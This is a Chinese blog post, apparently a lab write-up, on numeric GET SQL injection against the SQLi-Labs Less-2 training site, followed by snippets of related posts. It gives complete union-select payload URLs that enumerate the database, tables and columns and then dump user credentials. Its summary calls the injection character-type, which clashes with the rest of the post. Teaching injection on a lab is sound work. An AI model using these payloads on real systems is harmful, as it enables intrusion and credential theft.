SQL注入——基于联合查询的数字型GET注入

已于 2022-02-16 20:22:09 修改
阅读量579 收藏 5
点赞数
文章标签: sql 安全 web安全
于 2022-02-16 19:43:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52072846/article/details/122968166
版权

实验目的:

理解数字型GET注入的原理和特点,掌握利用联合查询(union select)的方法实现SQL注入的基本流程

实验原理

数字型GET注入,其注入点存在于URL中的GET参数处,如
http://wwwtestweb.com/userphp?id=8,而服务器后端实际查询代码原型诸如:
"select ... from ...where id=$id…”
攻击者可以通过构造恶意的GET输入参数,利用union select命令进行注入,暴露数据库中存储的信息。

实验步骤

本实验的目标是:以SQLi-Labs网站的Less-2为入口,利用联合查询(union select)的方式实施SQL注入,获取SQLi-Labs网站的登录用户名和密码。

1.访问SQLi-Labs网站

攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs上的
SQLi-Labs网站Less-2。访问的URL为:

注:因为我把sqli-labs文件名字改为了sql,所以以下sqli-labs均以sql表示

http://[靶机IP]/sqli-labs/Less-2/

 根据网页提示,给GET定一个参数

http://[靶机IP]/sql/Less-2/?id=1

注:该实验中Firefox浏览器已经提前安装好HackBar插件,在上图的界面中右击鼠标,点击 检查 即可进入控制台,随后点击HackBar即可使用该插件 (部分机型按F12即可进入控制台)

2.寻找注入点

分别使用一下三条payload寻找注入点并判断注入点的类型

http://[靶机IP]/sql/Less-2/?id=1'

运行报错

http://[靶机IP]/sql/Less-2/?id=1 and 1=1

运行正常

http://[靶机IP]/sql/Less-2/?id=1 and 1=2

运行异常

由此可以判断出:网站存在数字型注入点

3.判断网站查询的字数段

使用以下payload获取网站查询的字数段(关键字order by):

http://[靶机IP]/sql/Less-2/?id=1 order by 1--+

显示正常

http://[靶机IP]/sql/Less-2/?id=1 order by 2--+

显示正常

http://[靶机IP]/sql/Less-2/?id=1 order by 3--+

显示正常

 

http://[靶机IP]/sql/Less-2/?id=1 order by 4--+

报错

由此可以判断出:网站查询数字段为3

4.判断网站的回显位置

利用以下payload判断网站的回显位置

http://[靶机IP]/sql/Less-2/?id=1 and 1=2 union select 1,2,3--+

显示2号位和3号位可以回显

5.获取网站当前所在数据库的库名

使用以下payload获取网站所在数据库的名字

http://[靶机IP]/sql/Less-2/?id=1 and 1=2 union select 1,2,database()--+

结果为:security

6.获取数据库security的全部表名

使用以下payload获取数据库security的全部表名

http://[靶机IP]/sql/Less-2/?id=1 and 1=2 union select 1,2,group_concat(table_name) from   information_schema.tables where table_schema='security'--+
显示结果中,有一个名为users的表,这当中可能存放着网站用户的基本信息。

 7.获取users表的全部字段名

使用以下payload获取users表的全部字段名:

http://[靶机IP]/sql/Less-2/?id=1 and 1=2 union select 1,2,group_concat(column_name) from  information_schema.columns where table_schema='security' and table_name='users'--+.

8.获取users表id、username和password字段的全部值。

由于users表中存放着多组用户名和密码的数据,而每次只能显示一组数据,我们可以通过limit M,N的方式逐条显示,如

(1)显示第1组数据
注:下列的命令中末尾的0,1即为赋予M,N的值

http://「靶机IP1/sql/Less-2/?id=1 and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 0,1--+
显示结果为Dump,Dump。

(2)显示第2组数据

http://「靶机IP1/sql/Less-2/?id=1 and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 1,1--+
显示结果为Angelina,l-kill-you

(3)显示第3组数据

http://「靶机IP1/sql/Less-2/?id=1 and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 2,1--+
显示结果为Dummy,p@ssword

 以此类推,可以通过修改limit后面的参数,将users表中存放的所有用户信息全部暴露出来

实验总结

本次实验,成功实现了对存在字符型GET注入点的网站的手工SQL注入,掌握了基于联合查询的注入方法和流程。

江月未来
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL 注入-基于联合查询的字符型GET注入
xdjxi的博客
02-16 643
实验原理 字符型GET注入,其注入点存在于URL中的GET参数处; 攻击者可以通过构造恶意的GET输入参数,利用union select 命令进行注入,暴露数据库中存储的信息。 实验步骤 1 访问SQLI-Labs网站 http://(加靶机IP)/sqli-labs/Less-1/ 登录后,根据网页提示,定一个GET参数 http://(靶机ip)/sqli - labs / Less/?id=1 2 寻找注入点 用以下三条payload寻找注入点及判断注入点的类型; http:/
SQL注入-基于联合查询的数字型GET注入
weixin_46831054的博客
02-16 3593
实验原理 数字型GET注入,其注入点存在于URL中的参数处。 攻击者可以通过构造恶意的get输入参数,利用union select命令进行注入,暴露数据库中存储的信息。 实验一 步骤: 1.访问靶机网站:http://127.0.0.1:456/Less-2/ 登录后,根据网页,给出GET参数 ?id=1 显示出用户名:Dumb,密码:Dumb 注:该实验利用Firefox的插件:Hackbar。没有该插件可到搜索框里输入payload参数。 2.寻找注入点 http://127.0.0.1:456/L
网络安全——基于联合查询的字符型GET注入
weixin_54055099的博客
09-08 600
SQL注入之基于联合查询的字符GET注入
SQL注入——基于联合查询的POST注入
qq_52072846的博客
02-18 1127
实验目的: 理解数字型GET注入的原理和特点,掌握利用联合查询(union select)的方法实现SQL注入的基本流程 实验原理 POST注入,其注入点存在于POST表单中的参数处。攻击者可以通过代理抓包 工具(如Burpsuite)拦截并修改POST表单中的参数,利用union select命令进 行注入,暴露数据库中存储的信息。 实验步骤 本实验的目标是:以SQLi-Labs网站的Less-11为入口,利用联合查询(union select)的方式实施SQL注入,获取SQLi-Labs.
SQL注入原理及实践(一)--SQL注入联合查询
dulirongdudu的博客
06-23 1293
SQL注入原理及实践(一)–SQL注入联合查询 1)判断注入类型 一般采用【1and1=2】去判断,当输入【1and1=2】时, 如果报错,则为数字型注入, 如果显示正常,则为字符型注入 原理如下: 假设数据库执行命令为:select * from table_name where id=$id $id为用户所控,当输入【1and1=2】时 如果该注入为数字型,则将会显示如下: select * from table_name where id=1and1=2 该语句中,id=1为真;1=2为假;an
PHP实例开发源码——CMS部队门户站群系统.zip
12-01
6. **安全处理**:包括输入验证、SQL注入防护、XSS攻击防御等,确保系统安全。 7. **会话管理**:PHP提供session功能,用于跟踪用户状态和操作。 8. **文件操作**:读取、写入、上传和下载文件是CMS系统常见的功能,...
基于J2EE框架的个人博客系统项目毕业设计论文(源码和论文)
03-12
由于J2EE的开源的框架中提供了MVC模式实现框架Struts、对象关系模型中的Hibernate 的框架及拥有事务管理和依赖注入的Spring。利用现存框架可以更快开发系统。所以选择Java技术作为blog 的开发工具。 为了增加系统的...
CarRentalSystem:网上租车系统
03-11
作为一个涉及交易的在线系统,CarRentalSystem应具备用户数据加密、防止SQL注入、XSS攻击等安全措施,保护用户隐私和信息安全。 8. 扩展性与可维护性: 为了适应未来业务发展和需求变更,系统设计时应考虑模块化和...
burpsuite系列使用教程
09-12
1. GET单变量数字型:Intruder可以针对GET请求的单个数字参数进行遍历或猜测,例如,寻找未授权访问的页面或者敏感数据。 2. POST多变量字典型:对于POST请求中的多变量,Intruder能够进行更复杂的攻击策略,如字典...
testJdbc.rar
07-17
Statement适合执行静态SQL,而PreparedStatement适用于动态SQL,可以防止SQL注入。 - 执行SQL:调用Statement或PreparedStatement的`executeQuery()`或`executeUpdate()`方法执行SQL。 - 处理结果:如果执行的是...
SQL注入联合查询
JIAPINGZH的博客
06-01 301
当输入 and ‘1’='2时,后台执行 Sql 语句:select * from <表名> where id = '1' and '1'='2'语法正确,但逻辑判断错误,所以返回正确。说明:当输入 and ‘1’='1时,后台执行 Sql 语句:select * from <表名> where id = '1' and '1'='1'语法正确,逻辑判断正确,所以返回正确。(如果未报错,不代表不存在 Sql 注入,因为有可能页面对单引号做了过滤,这时可以使用判断语句进行注入。页面运行正常,继续进行下一步。
SQL注入——联合查询注入
dust_hk的博客
01-16 2293
0x01 SQL注入的原理 针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原 有SQL结构,达到编写程序时意料之外结果的攻击行为。其成因可以归结外一下 两个原因叠加造成的: 1、程序编写者在处理程序和数据库交互时,使用字符串拼接的方式构造SQL语句 2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中。 0x02 SQL注入的分类 一、根据注入点数据类型 1...
SQL注入——数字型union联合注入
heyingcheng的博客
03-05 295
联合查询union默认只显示union前一段语句查询到的结果,我们将id改为一个不存在的数字,从而使前一段语句查询不到结果,显示出最后一段语句查询到的内容。输入’判断是否存在注入点,如果报错则存在注入点。因为是数字型注入,所以根本不用考虑闭合方式。用and语句判断数字型还是字符型。所以判断是数字型注入
SQL注入之路之一:联合注入
最新发布
weixin_62715196的博客
08-10 651
简单介绍union联合注入的原理、常用数据库名,以及一次简单的手工联合注入流程
SQL注入概述与GET注入实例
weixin_59872639的博客
02-18 1232
SQL注入概述 什么是SQL注入漏洞 攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵。 SQL注入原理 服务端没有过滤用户输入的恶意数据,直接把用户输入的数据当做SQL语句执行,从而影响数据库安全和平台安全。 两个条件 用户能够控制输入 原本程序要执行的SQL语句,拼接了用户输入的恶意数据 SQL注入过程 SQL注入危害 绕过
注入SQL注入1
bwxzdjn的博客
03-18 1208
用实验案例的形式记录SQL注入按照注入点类型分类的三大基础注入形式:数字型注入、字符型注入和搜索型注入,采用手工注入的方法了解SQL注入的基本原理
Sql注入实验(一)——字符型注入GET
DaydreamF的博客
04-13 1438
Sqli-libs Less1——字符型注入 URL:http://192.168.224.128/sqli/Less-1/ 一、手工注入 1…打开页面,如下所示: 2.根据提示,在url后输入参数id的值,页面显示: 说明,根据传入id参数值的不同,后台服务器查询的数据不同,展示在了前端界面。(参数可控) 3.尝试在参数值的后面输入特殊字符,看页面是否报出数据库语法错误: 报错语句: You have an error in your SQL syntax; check the manual t
SQL注入——基于联合查询的字符型GET注入(三)
Gjqhs的博客
02-16 749
本章目的 普及字符型GET注入的原理和特点,掌握利用联合查询(unionselect)的方法 实现SQL注入的基本流程。 实验环境 攻击机:Pentest-Atk (1)操作系统:Windows10 (2)安装的应用软件:Sqlmap、Burpsuite、FireFox浏览器插件Hackbar、 FoxyProxy等 (3)登录账号密码:操作系统帐号Administrator,密码Sangfor!7890 靶机:A-SQLi-Labs (1)操作系统:Centos7 (2)安装的应用软件:Apache、M
SQL注入技巧详解:联合查询、报错注入与盲注方法
1. 联合查询注入 这是最常见的一种注入手法,攻击者利用`UNION`关键字进行操作。攻击者可能会构造如下类型的SQL语句: - 利用联合查询获取数据:当前查询结果非空时,攻击者可以执行两个查询并返回所有结果;如果为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值